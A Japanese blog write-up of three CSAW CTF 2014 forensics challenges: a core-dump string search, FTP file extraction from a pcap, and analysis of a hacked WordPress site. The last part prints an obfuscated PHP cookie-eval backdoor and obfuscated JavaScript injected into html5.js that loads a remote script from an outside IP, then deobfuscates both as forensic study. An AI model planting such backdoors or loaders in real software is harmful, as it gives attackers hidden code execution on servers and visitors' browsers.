<!doctype html><html lang=en>
<head>
<meta charset=utf-8>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta name=description content>
<meta name=generator content="Hugo 0.92.0">
<title>CSAW CTF 2014 Quals Forensics &#183; Hello, (forgotten) world ☂</title>
<link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/pure/1.0.0/pure-min.css><!--[if lte IE 8]><link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/pure/1.0.0/grids-responsive-old-ie-min.css><![endif]--><!--[if gt IE 8]><!-->
<link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/pure/1.0.0/grids-responsive-min.css><!--<![endif]--><!--[if lte IE 8]><link rel=stylesheet href=https://aquarite.info/css/side-menu-old-ie.css><![endif]--><!--[if gt IE 8]><!-->
<link rel=stylesheet href=https://aquarite.info/css/side-menu.css><!--<![endif]-->
<link rel=stylesheet href=https://aquarite.info/css/blackburn.css>
<link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css>
<link rel=preconnect href=https://fonts.gstatic.com>
<link href="https://fonts.googleapis.com/css2?family=Raleway&display=swap" rel=stylesheet type=text/css>
<link rel="shortcut icon" href=https://aquarite.info/img/favicon.ico type=image/x-icon>
</head>
<body>
<div id=layout>
<a href=#menu id=menuLink class=menu-link>
<span></span>
</a>
<div id=menu>
<a class="pure-menu-heading brand" href=https://aquarite.info/>aquarite.info</a>
<div class=pure-menu>
<ul class=pure-menu-list>
<li class=pure-menu-item>
<a class=pure-menu-link href=https://aquarite.info/><i class="fa fa-home fa-fw"></i>Home</a>
</li>
<li class=pure-menu-item>
<a class=pure-menu-link href=https://aquarite.info/about/><i class="fa fa-user fa-fw"></i>About</a>
</li>
</ul>
</div>
<div class="pure-menu social">
<ul class=pure-menu-list>
<li class=pure-menu-item>
<a class=pure-menu-link href=https://twitter.com/maytheplic rel=me target=_blank><i class="fab fa-twitter-square fa-fw"></i>Twitter</a>
</li>
<li class=pure-menu-item>
<a class=pure-menu-link href=https://github.com/mayth rel=me target=_blank><i class="fab fa-github-square fa-fw"></i>GitHub</a>
</li>
<li class=pure-menu-item>
<a class=pure-menu-link href=https://steamcommunity.com/id/maythorzy rel=me target=_blank><i class="fab fa-steam-square fa-fw"></i>Steam</a>
</li>
</ul>
</div>
<div>
<div class=small-print>
<small>&copy; 2021 Mei Akizuru. All rights reserved.</small>
</div>
<div class=small-print>
<small>Built with&nbsp;<a href=https://gohugo.io/ target=_blank>Hugo</a></small>
<small>Theme&nbsp;<a href=https://github.com/yoshiharuyamashita/blackburn target=_blank>Blackburn</a></small>
</div>
</div>
</div>
<div id=main>
<div class=header>
<h1>CSAW CTF 2014 Quals Forensics</h1>
<h2></h2>
</div>
<div class=content>
<p>CSAW CTF 2014 Quals、Forensicsのwrite-upです。私が解いたのはForensicsの4問中、200点のObscurityを除いた3問です。</p>
<h1 id=100-dumpster-diving>[100] dumpster diving</h1>
<h2 id=問題文>問題文</h2>
<blockquote>
<p>dumpsters are cool, but cores are cooler</p>
<p>Written by marc</p>
<p>firefox.mem.zip</p>
</blockquote>
<h2 id=解答>解答</h2>
<p>Answer: cd69b4957f06cd818d7bf3d61980e291</p>
<p>与えられるのは&rsquo;firefox.mem.zip&rsquo;で、コアダンプです。私が取りかかった時点で既に他のメンバーからbinwalkしてみたらSQLiteのなんかが見えていると報告がありました。Firefoxのコアダンプであれば何か見えててもおかしくないですね。</p>
<p>とりあえずstringsで何か見えないかなと思ってstringsの出力結果を&rsquo;flag&rsquo;でgrepしてみます。</p>
<pre tabindex=0><code>(前略)
etablemoz_annosmoz_annos CREATE TABLE moz_annos (  id INTEGER PRIMARY KEY, place_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)
ZZZZZZZZflag{cd69b4957f06cd818d7bf3d61980e291}
ZZZZZZZZZZZZZZTransparent BG enabling flag
(後略)
</code></pre><p>マジで見つかりました。本当にありがとうございました。</p>
<h1 id=200-why-not-sftp>[200] why not sftp?</h1>
<h2 id=問題文-1>問題文</h2>
<blockquote>
<p>well seriously, why not?</p>
<p>Written by marc</p>
<p>traffic-5.pcap</p>
</blockquote>
<h2 id=解答-1>解答</h2>
<p>Answer: 91e02cd2b8621d0c05197f645668c5c4</p>
<p>与えられる&rsquo;traffic-5.pcap&rsquo;をとりあえずWiresharkで見てみます。問題名が&rsquo;why not sftp?&lsquo;なんだし、きっとFTP通信でなんかやってるだろうと思ってftpとftp-dataでフィルタします。通信を追っていくと&rsquo;/files/zip.zip&rsquo;をダウンロードしています。当該するdataの方の通信をFollow TCP Streamするとflag.pngとか書いてあるのでまず間違いなさそうです。ftp-dataのパケットからzip.zipを抽出します。</p>
<p>取り出したzip.zipはパスワードも何もかかっていないのでそのまま展開します。するとflag.pngが展開され、それにフラグが書かれていました。</p>
<p>余談ですが、HTTPでやりとりしたファイルはWiresharkのExport Objectsから取り出せますが、FTPの場合はデータ通信の方をFollow TCP StreamしてRawで保存すればよいことをお勉強しました。</p>
<h1 id=300-fluffy-no-more>[300] Fluffy No More</h1>
<h2 id=問題文-2>問題文</h2>
<blockquote>
<p>OH NO WE&rsquo;VE BEEN HACKED!!!!!! &ndash; said the Eye Heart Fluffy Bunnies Blog owner. Life was grand for the fluff fanatic until one day the site&rsquo;s users started to get attacked! Apparently fluffy bunnies are not just a love of fun furry families but also furtive foreign governments. The notorious &ldquo;Forgotten Freaks&rdquo; hacking group was known to be targeting high powered politicians. Were the cute bunnies the next in their long list of conquests!??</p>
<p>Well&mldr; The fluff needs your stuff. I&rsquo;ve pulled the logs from the server for you along with a backup of it&rsquo;s database and configuration. Figure out what is going on!</p>
<p>Written by brad_anton</p>
<p>CSAW2014-FluffyNoMore-v0.1.tar.bz2</p>
</blockquote>
<h2 id=解答-2>解答</h2>
<p>Answer: Those Fluffy Bunnies Make Tummy Bumpy</p>
<p>与えられたアーカイブを展開すると、etc_directory.tar.bz、logs.tar.bz2、webroot.tar.bz2、mysql_backup.sql.bz2の4つのファイルが出てきます。それぞれ、etc以下、/var/log以下、/var/www以下を固めたもので、mysql_backup.sql.bz2はmysqldumpの出力結果をbzip2で圧縮したものです。</p>
<p>/var/www以下やデータベースのダンプを見るにWordPressが動いていて、そこがやられたという状況のようです。ひとまずapache2のaccess.logを見ていきます。非常に大きなファイルですが、大半はツールによるアタック試行のログです。SQLインジェクションやら何やらを色々試しています。データベースのダンプを見るとwp_commentsに犯人による犯行予告（「ハックしてやったぜBWHAHAHAHA」じゃなくて「ハックしてやるぜBWHAHAHA」だった）があるので、そのコメントの時刻以降のログを見てみます。</p>
<p>まずPOSTに絞って見てみるとプラグイン絡みでちょっと怪しげなログを見つけました。wysija-newslettersというプラグインで、そのプラグインについて調べてみたところ、任意ファイルのアップロードが可能な脆弱性が存在していたそうです。その後その脆弱性は修正されましたが、実際にはPHPの設定によってはその対策をすり抜けることが可能でした（そしてさらに対策される）。この環境にインストールされているもののバージョンを調べてみると、ちょうどその脆弱性が残っていたバージョンだった上に、<a href=http://blog.sucuri.net/2014/07/mailpoet-vulnerability-exploited-in-the-wild-breaking-thousands-of-wordpress-sites.html>WordPress Security - MailPoet Vuln Contributes to Thousands of Infected Websites | Sucuri Blog</a>で言及されているのと同じ形のログが残っていました。</p>
<p>アクセスログから/wp-content/uploads/wysija/themes/weblizer/template.phpというのにアクセスしていることがわかったので、そのファイルを見てみます。中身は次のようなPHPファイルです。</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=color:#ff79c6>&lt;?</span>php
<span style=color:#8be9fd;font-style:italic>$hije</span> <span style=color:#ff79c6>=</span> str_replace(<span style=color:#f1fa8c>&#34;ey&#34;</span>,<span style=color:#f1fa8c>&#34;&#34;</span>,<span style=color:#f1fa8c>&#34;seyteyrey_reyeeypleyaeyceye&#34;</span>);
<span style=color:#8be9fd;font-style:italic>$andp</span><span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;JsqGMsq9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSsqk9PSdoYScgJisqYgsqJsqGMoJ&#34;</span>;
<span style=color:#8be9fd;font-style:italic>$rhhm</span><span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;nsqKSwgam9pbihhcnJheV9zbGljZSgkYSwksqYygkYSksqtMykpKSksqpO2VjaG8sqgJsqzwvJy4kay4nPic7fQ==&#34;</span>;
<span style=color:#8be9fd;font-style:italic>$pvqw</span><span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;GEpPjMpeyRrPSdja2l0JztlY2hvICc8Jy4kaysq4nPicsq7ZXZhbChsqiYXNlNjRfZGVjb2RlKHByZsqWdfcmVw&#34;</span>;
<span style=color:#8be9fd;font-style:italic>$wfrm</span><span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;bGFjZShhcnsqJheSsqgsqnsqL1teXHcsq9XHNdLycsJy9ccy8nKSwgYsqXJyYXksqoJycsJyssq&#34;</span>;
<span style=color:#8be9fd;font-style:italic>$vyoh</span> <span style=color:#ff79c6>=</span> <span style=color:#8be9fd;font-style:italic>$hije</span>(<span style=color:#f1fa8c>&#34;n&#34;</span>, <span style=color:#f1fa8c>&#34;&#34;</span>, <span style=color:#f1fa8c>&#34;nbnansne64n_ndnecode&#34;</span>);
<span style=color:#8be9fd;font-style:italic>$bpzy</span> <span style=color:#ff79c6>=</span> <span style=color:#8be9fd;font-style:italic>$hije</span>(<span style=color:#f1fa8c>&#34;z&#34;</span>,<span style=color:#f1fa8c>&#34;&#34;</span>,<span style=color:#f1fa8c>&#34;zczreaztzez_zfzuznzcztzizon&#34;</span>);
<span style=color:#8be9fd;font-style:italic>$xhju</span> <span style=color:#ff79c6>=</span> <span style=color:#8be9fd;font-style:italic>$bpzy</span>(<span style=color:#f1fa8c>&#39;&#39;</span>, <span style=color:#8be9fd;font-style:italic>$vyoh</span>(<span style=color:#8be9fd;font-style:italic>$hije</span>(<span style=color:#f1fa8c>&#34;sq&#34;</span>, <span style=color:#f1fa8c>&#34;&#34;</span>, <span style=color:#8be9fd;font-style:italic>$andp</span><span style=color:#ff79c6>.</span><span style=color:#8be9fd;font-style:italic>$pvqw</span><span style=color:#ff79c6>.</span><span style=color:#8be9fd;font-style:italic>$wfrm</span><span style=color:#ff79c6>.</span><span style=color:#8be9fd;font-style:italic>$rhhm</span>))); <span style=color:#8be9fd;font-style:italic>$xhju</span>();
<span style=color:#ff79c6>?&gt;</span>
</code></pre></div><p><code>$hije</code>が<code>str_replace</code>、<code>$vyoh</code>が<code>base64_decode</code>、<code>$bpzy</code>が<code>create_function</code>関数です。このとき初めて知ったんですが、PHPでは文字列変数に対して<code>$hoge()</code>みたいに<code>()</code>を付けて使うと、その変数に入っている名前の関数を呼び出すという機能があります。びっくり。</p>
<p>それはともかくとして、このコードは</p>
<ol>
<li><code>$andp</code>、<code>$pvqw</code>、<code>$wfrm</code>、<code>$rhhm</code>を結合する</li>
<li>その中の&rsquo;sq&rsquo;を取り除く</li>
<li>その文字列をBase64デコードする</li>
<li>その文字列を関数化する</li>
<li>それを実行する</li>
</ol>
<p>というコードです。<code>create_function</code>で関数化されたコードは次のコードです（実際の出力を整形しています）</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=color:#8be9fd;font-style:italic>$c</span><span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#39;count&#39;</span>;
<span style=color:#8be9fd;font-style:italic>$a</span><span style=color:#ff79c6>=</span><span style=color:#8be9fd;font-style:italic>$_COOKIE</span>;
<span style=color:#ff79c6>if</span> (reset(<span style=color:#8be9fd;font-style:italic>$a</span>) <span style=color:#ff79c6>==</span> <span style=color:#f1fa8c>&#39;ha&#39;</span> <span style=color:#ff79c6>&amp;&amp;</span> <span style=color:#8be9fd;font-style:italic>$c</span>(<span style=color:#8be9fd;font-style:italic>$a</span>) <span style=color:#ff79c6>&gt;</span> <span style=color:#bd93f9>3</span>) {
  <span style=color:#8be9fd;font-style:italic>$k</span><span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#39;ckit&#39;</span>;
  <span style=color:#ff79c6>echo</span> <span style=color:#f1fa8c>&#39;&lt;&#39;</span><span style=color:#ff79c6>.</span><span style=color:#8be9fd;font-style:italic>$k</span><span style=color:#ff79c6>.</span><span style=color:#f1fa8c>&#39;&gt;&#39;</span>;
  <span style=color:#ff79c6>eval</span>(base64_decode(preg_replace(<span style=color:#ff79c6>array</span>(<span style=color:#f1fa8c>&#39;/[^\w=\s]/&#39;</span>,<span style=color:#f1fa8c>&#39;/\s/&#39;</span>), <span style=color:#ff79c6>array</span>(<span style=color:#f1fa8c>&#39;&#39;</span>,<span style=color:#f1fa8c>&#39;+&#39;</span>), join(array_slice(<span style=color:#8be9fd;font-style:italic>$a</span>,<span style=color:#8be9fd;font-style:italic>$c</span>(<span style=color:#8be9fd;font-style:italic>$a</span>)<span style=color:#ff79c6>-</span><span style=color:#bd93f9>3</span>)))));
  <span style=color:#ff79c6>echo</span> <span style=color:#f1fa8c>&#39;&lt;/&#39;</span><span style=color:#ff79c6>.</span><span style=color:#8be9fd;font-style:italic>$k</span><span style=color:#ff79c6>.</span><span style=color:#f1fa8c>&#39;&gt;&#39;</span>;
}
</code></pre></div><p>Cookieが所定の条件を満たすとき、その中に入っているBase64文字列をevalする、というコードのようです。どう見てもバックドアです。本当にありがとうございました。</p>
<p>しかし、ログに記録されてない上にパケットキャプチャもないので、Cookieの中身はわかりません。つまりどんなコードが実行されたのかが全く不明です。データベースの中に何かしら残っていないか探してみましたが見つかりません。ここで一旦手詰まりとなってしまいました。</p>
<p>そこで隣に座ってた某氏が'/var/log/auth.log&rsquo;を見ていて次の箇所を指摘しました。</p>
<pre tabindex=0><code>Sep 17 19:20:09 ubuntu sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js
</code></pre><p>ご覧の通り、sudoでviが実行されています。察し。……ていうかubuntuユーザーでログインされてsudoまでされてるんですがそれは……。</p>
<p>それはともかく/wp-content/themes/twentythirteen/js/html5.jsを見てみます。先頭のコメントにHTML5 Shivとあります。バージョンは3.7.0。<a href=https://github.com/aFarkas/html5shiv>HTML5Shivのリポジトリ</a>から3.7.0のファイルをダウンロードし、このファイルとの差異を探すと、末尾に次のコードが追加されていました。</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=color:#8be9fd;font-style:italic>var</span> g<span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;ti&#34;</span>;<span style=color:#8be9fd;font-style:italic>var</span> c<span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;HTML Tags&#34;</span>;<span style=color:#8be9fd;font-style:italic>var</span> f<span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;. li colgroup br src datalist script option .&#34;</span>;f <span style=color:#ff79c6>=</span> f.split(<span style=color:#f1fa8c>&#34; &#34;</span>);c<span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;&#34;</span>;k<span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;/&#34;</span>;m<span style=color:#ff79c6>=</span>f[<span style=color:#bd93f9>6</span>];<span style=color:#ff79c6>for</span>(<span style=color:#8be9fd;font-style:italic>var</span> i<span style=color:#ff79c6>=</span><span style=color:#bd93f9>0</span>;i<span style=color:#ff79c6>&lt;</span>f.length;i<span style=color:#ff79c6>++</span>){c<span style=color:#ff79c6>+=</span>f[i].length.toString();}v<span style=color:#ff79c6>=</span>f[<span style=color:#bd93f9>0</span>];x<span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;\&#39;ht&#34;</span>;b<span style=color:#ff79c6>=</span>f[<span style=color:#bd93f9>4</span>];f<span style=color:#ff79c6>=</span><span style=color:#bd93f9>2541</span><span style=color:#ff79c6>*</span><span style=color:#bd93f9>6</span><span style=color:#ff79c6>-</span><span style=color:#bd93f9>35</span><span style=color:#ff79c6>+</span><span style=color:#bd93f9>46</span><span style=color:#ff79c6>+</span><span style=color:#bd93f9>12</span><span style=color:#ff79c6>-</span><span style=color:#bd93f9>15269</span>;c<span style=color:#ff79c6>+=</span>f.toString();f<span style=color:#ff79c6>=</span>(<span style=color:#bd93f9>56</span><span style=color:#ff79c6>+</span><span style=color:#bd93f9>31</span><span style=color:#ff79c6>+</span><span style=color:#bd93f9>68</span><span style=color:#ff79c6>*</span><span style=color:#bd93f9>65</span><span style=color:#ff79c6>+</span><span style=color:#bd93f9>41</span><span style=color:#ff79c6>-</span><span style=color:#bd93f9>548</span>)<span style=color:#ff79c6>/</span><span style=color:#bd93f9>4000</span><span style=color:#ff79c6>-</span><span style=color:#bd93f9>1</span>;c<span style=color:#ff79c6>+=</span>f.toString();f<span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;&#34;</span>;c<span style=color:#ff79c6>=</span>c.split(<span style=color:#f1fa8c>&#34;&#34;</span>);<span style=color:#8be9fd;font-style:italic>var</span> w<span style=color:#ff79c6>=</span><span style=color:#bd93f9>0</span>;u<span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#34;s&#34;</span>;<span style=color:#ff79c6>for</span>(<span style=color:#8be9fd;font-style:italic>var</span> i<span style=color:#ff79c6>=</span><span style=color:#bd93f9>0</span>;i<span style=color:#ff79c6>&lt;</span>c.length;i<span style=color:#ff79c6>++</span>){<span style=color:#ff79c6>if</span>(((i<span style=color:#ff79c6>==</span><span style=color:#bd93f9>3</span><span style=color:#ff79c6>||</span>i<span style=color:#ff79c6>==</span><span style=color:#bd93f9>6</span>)<span style=color:#ff79c6>&amp;&amp;</span>w<span style=color:#ff79c6>!=</span><span style=color:#bd93f9>2</span>)<span style=color:#ff79c6>||</span>((i<span style=color:#ff79c6>==</span><span style=color:#bd93f9>8</span>)<span style=color:#ff79c6>&amp;&amp;</span>w<span style=color:#ff79c6>==</span><span style=color:#bd93f9>2</span>)){f<span style=color:#ff79c6>+=</span><span style=color:#8be9fd;font-style:italic>String</span>.fromCharCode(<span style=color:#bd93f9>46</span>);w<span style=color:#ff79c6>++</span>;}f<span style=color:#ff79c6>+=</span>c[i];} i<span style=color:#ff79c6>=</span>k<span style=color:#ff79c6>+</span><span style=color:#f1fa8c>&#34;anal&#34;</span>; <span style=color:#8be9fd;font-style:italic>document</span>.write(<span style=color:#f1fa8c>&#34;&lt;&#34;</span><span style=color:#ff79c6>+</span>m<span style=color:#ff79c6>+</span><span style=color:#f1fa8c>&#34; &#34;</span><span style=color:#ff79c6>+</span>b<span style=color:#ff79c6>+</span><span style=color:#f1fa8c>&#34;=&#34;</span><span style=color:#ff79c6>+</span>x<span style=color:#ff79c6>+</span><span style=color:#f1fa8c>&#34;tp:&#34;</span><span style=color:#ff79c6>+</span>k<span style=color:#ff79c6>+</span>k<span style=color:#ff79c6>+</span>f<span style=color:#ff79c6>+</span>i<span style=color:#ff79c6>+</span><span style=color:#f1fa8c>&#34;y&#34;</span><span style=color:#ff79c6>+</span>g<span style=color:#ff79c6>+</span><span style=color:#f1fa8c>&#34;c&#34;</span><span style=color:#ff79c6>+</span>u<span style=color:#ff79c6>+</span>v<span style=color:#ff79c6>+</span><span style=color:#f1fa8c>&#34;j&#34;</span><span style=color:#ff79c6>+</span>u<span style=color:#ff79c6>+</span><span style=color:#f1fa8c>&#34;\&#39;&gt;\&lt;/&#34;</span><span style=color:#ff79c6>+</span>m<span style=color:#ff79c6>+</span><span style=color:#f1fa8c>&#34;\&gt;&#34;</span>);
</code></pre></div><p><a href=http://jsbeautifier.org/>beautify</a>してみます。</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=color:#8be9fd;font-style:italic>var</span> g <span style=color:#ff79c6>=</span> <span style=color:#f1fa8c>&#34;ti&#34;</span>;
<span style=color:#8be9fd;font-style:italic>var</span> c <span style=color:#ff79c6>=</span> <span style=color:#f1fa8c>&#34;HTML Tags&#34;</span>;
<span style=color:#8be9fd;font-style:italic>var</span> f <span style=color:#ff79c6>=</span> <span style=color:#f1fa8c>&#34;. li colgroup br src datalist script option .&#34;</span>;
f <span style=color:#ff79c6>=</span> f.split(<span style=color:#f1fa8c>&#34; &#34;</span>);
c <span style=color:#ff79c6>=</span> <span style=color:#f1fa8c>&#34;&#34;</span>;
k <span style=color:#ff79c6>=</span> <span style=color:#f1fa8c>&#34;/&#34;</span>;
m <span style=color:#ff79c6>=</span> f[<span style=color:#bd93f9>6</span>];
<span style=color:#ff79c6>for</span> (<span style=color:#8be9fd;font-style:italic>var</span> i <span style=color:#ff79c6>=</span> <span style=color:#bd93f9>0</span>; i <span style=color:#ff79c6>&lt;</span> f.length; i<span style=color:#ff79c6>++</span>) {
    c <span style=color:#ff79c6>+=</span> f[i].length.toString();
}
v <span style=color:#ff79c6>=</span> f[<span style=color:#bd93f9>0</span>];
x <span style=color:#ff79c6>=</span> <span style=color:#f1fa8c>&#34;\&#39;ht&#34;</span>;
b <span style=color:#ff79c6>=</span> f[<span style=color:#bd93f9>4</span>];
f <span style=color:#ff79c6>=</span> <span style=color:#bd93f9>2541</span> <span style=color:#ff79c6>*</span> <span style=color:#bd93f9>6</span> <span style=color:#ff79c6>-</span> <span style=color:#bd93f9>35</span> <span style=color:#ff79c6>+</span> <span style=color:#bd93f9>46</span> <span style=color:#ff79c6>+</span> <span style=color:#bd93f9>12</span> <span style=color:#ff79c6>-</span> <span style=color:#bd93f9>15269</span>;
c <span style=color:#ff79c6>+=</span> f.toString();
f <span style=color:#ff79c6>=</span> (<span style=color:#bd93f9>56</span> <span style=color:#ff79c6>+</span> <span style=color:#bd93f9>31</span> <span style=color:#ff79c6>+</span> <span style=color:#bd93f9>68</span> <span style=color:#ff79c6>*</span> <span style=color:#bd93f9>65</span> <span style=color:#ff79c6>+</span> <span style=color:#bd93f9>41</span> <span style=color:#ff79c6>-</span> <span style=color:#bd93f9>548</span>) <span style=color:#ff79c6>/</span> <span style=color:#bd93f9>4000</span> <span style=color:#ff79c6>-</span> <span style=color:#bd93f9>1</span>;
c <span style=color:#ff79c6>+=</span> f.toString();
f <span style=color:#ff79c6>=</span> <span style=color:#f1fa8c>&#34;&#34;</span>;
c <span style=color:#ff79c6>=</span> c.split(<span style=color:#f1fa8c>&#34;&#34;</span>);
<span style=color:#8be9fd;font-style:italic>var</span> w <span style=color:#ff79c6>=</span> <span style=color:#bd93f9>0</span>;
u <span style=color:#ff79c6>=</span> <span style=color:#f1fa8c>&#34;s&#34;</span>;
<span style=color:#ff79c6>for</span> (<span style=color:#8be9fd;font-style:italic>var</span> i <span style=color:#ff79c6>=</span> <span style=color:#bd93f9>0</span>; i <span style=color:#ff79c6>&lt;</span> c.length; i<span style=color:#ff79c6>++</span>) {
    <span style=color:#ff79c6>if</span> (((i <span style=color:#ff79c6>==</span> <span style=color:#bd93f9>3</span> <span style=color:#ff79c6>||</span> i <span style=color:#ff79c6>==</span> <span style=color:#bd93f9>6</span>) <span style=color:#ff79c6>&amp;&amp;</span> w <span style=color:#ff79c6>!=</span> <span style=color:#bd93f9>2</span>) <span style=color:#ff79c6>||</span> ((i <span style=color:#ff79c6>==</span> <span style=color:#bd93f9>8</span>) <span style=color:#ff79c6>&amp;&amp;</span> w <span style=color:#ff79c6>==</span> <span style=color:#bd93f9>2</span>)) {
        f <span style=color:#ff79c6>+=</span> <span style=color:#8be9fd;font-style:italic>String</span>.fromCharCode(<span style=color:#bd93f9>46</span>);
        w<span style=color:#ff79c6>++</span>;
    }
    f <span style=color:#ff79c6>+=</span> c[i];
}
i <span style=color:#ff79c6>=</span> k <span style=color:#ff79c6>+</span> <span style=color:#f1fa8c>&#34;anal&#34;</span>;
<span style=color:#8be9fd;font-style:italic>document</span>.write(<span style=color:#f1fa8c>&#34;&lt;&#34;</span> <span style=color:#ff79c6>+</span> m <span style=color:#ff79c6>+</span> <span style=color:#f1fa8c>&#34; &#34;</span> <span style=color:#ff79c6>+</span> b <span style=color:#ff79c6>+</span> <span style=color:#f1fa8c>&#34;=&#34;</span> <span style=color:#ff79c6>+</span> x <span style=color:#ff79c6>+</span> <span style=color:#f1fa8c>&#34;tp:&#34;</span> <span style=color:#ff79c6>+</span> k <span style=color:#ff79c6>+</span> k <span style=color:#ff79c6>+</span> f <span style=color:#ff79c6>+</span> i <span style=color:#ff79c6>+</span> <span style=color:#f1fa8c>&#34;y&#34;</span> <span style=color:#ff79c6>+</span> g <span style=color:#ff79c6>+</span> <span style=color:#f1fa8c>&#34;c&#34;</span> <span style=color:#ff79c6>+</span> u <span style=color:#ff79c6>+</span> v <span style=color:#ff79c6>+</span> <span style=color:#f1fa8c>&#34;j&#34;</span> <span style=color:#ff79c6>+</span> u <span style=color:#ff79c6>+</span> <span style=color:#f1fa8c>&#34;\&#39;&gt;\&lt;/&#34;</span> <span style=color:#ff79c6>+</span> m <span style=color:#ff79c6>+</span> <span style=color:#f1fa8c>&#34;\&gt;&#34;</span>);
</code></pre></div><p>このコードをnodeに与えて、<code>document.write</code>の引数になっている文字列を見てみると次のようになります。</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>&lt;<span style=color:#ff79c6>script</span> <span style=color:#50fa7b>src</span><span style=color:#ff79c6>=</span><span style=color:#f1fa8c>&#39;http://128.238.66.100/analytics.js&#39;</span>&gt;&lt;/<span style=color:#ff79c6>script</span>&gt;
</code></pre></div><p>つまりhtml5.jsが実行されると&rsquo;http://128.238.66.100/analytics.js&rsquo;が読まれて実行されるわけです。ここにアクセスしてanalytics.jsを見てみます（長いので中身は省略します）。すると、明らかにおかしな箇所がありました。</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=color:#8be9fd;font-style:italic>var</span> _0x91fe <span style=color:#ff79c6>=</span> [<span style=color:#f1fa8c>&#34;\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66&#34;</span>, <span style=color:#f1fa8c>&#34;\x5F\x73\x65\x6C\x66&#34;</span>, <span style=color:#f1fa8c>&#34;\x6F\x70\x65\x6E&#34;</span>];
<span style=color:#8be9fd;font-style:italic>window</span>[_0x91fe[<span style=color:#bd93f9>2</span>]](_0x91fe[<span style=color:#bd93f9>0</span>], _0x91fe[<span style=color:#bd93f9>1</span>]);
</code></pre></div><p><code>_0x91fe</code>に代入している箇所をnodeに与えて中身を見てみます。</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=color:#ff79c6>&gt;</span> <span style=color:#8be9fd;font-style:italic>var</span> _0x91fe <span style=color:#ff79c6>=</span> [<span style=color:#f1fa8c>&#34;\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66&#34;</span>, <span style=color:#f1fa8c>&#34;\x5F\x73\x65\x6C\x66&#34;</span>, <span style=color:#f1fa8c>&#34;\x6F\x70\x65\x6E&#34;</span>];
<span style=color:#ff79c6>undefined</span>
<span style=color:#ff79c6>&gt;</span> _0x91fe
[ <span style=color:#f1fa8c>&#39;http://128.238.66.100/announcement.pdf&#39;</span>,
  <span style=color:#f1fa8c>&#39;_self&#39;</span>,
  <span style=color:#f1fa8c>&#39;open&#39;</span> ]
</code></pre></div><p>これを踏まえた上で先のコードの2行目を見れば、<code>window['open']</code>(<code>window.open</code>関数)で&rsquo;http://128.238.66.100/announcement.pdf&rsquo;を開いていることになります。</p>
<p>&lsquo;http://128.238.66.100/announcement.pdf&rsquo;は実際にPDFで、なんかビジュアル系バンドっぽい人物の写真に&rsquo;I AM HACKING YOU RIGHT NOW&rsquo;という文が書いてある画像があるだけのPDFです。</p>
<p>ひとしきりここで爆笑して作業に戻りますと、pdfextractでストリームデータをダンプしてみるように言われました。-sオプションを使ってストリームをダンプします。結果として&rsquo;stream_{1,2,3,8}.dmp&rsquo;の4つのファイルが現れます。これらに対してひとまずstringsをしてみます（ていうか先にfileで見てみるべきだったかもしれない）。すると&rsquo;stream_8.dmp&rsquo;に何か書かれています。</p>
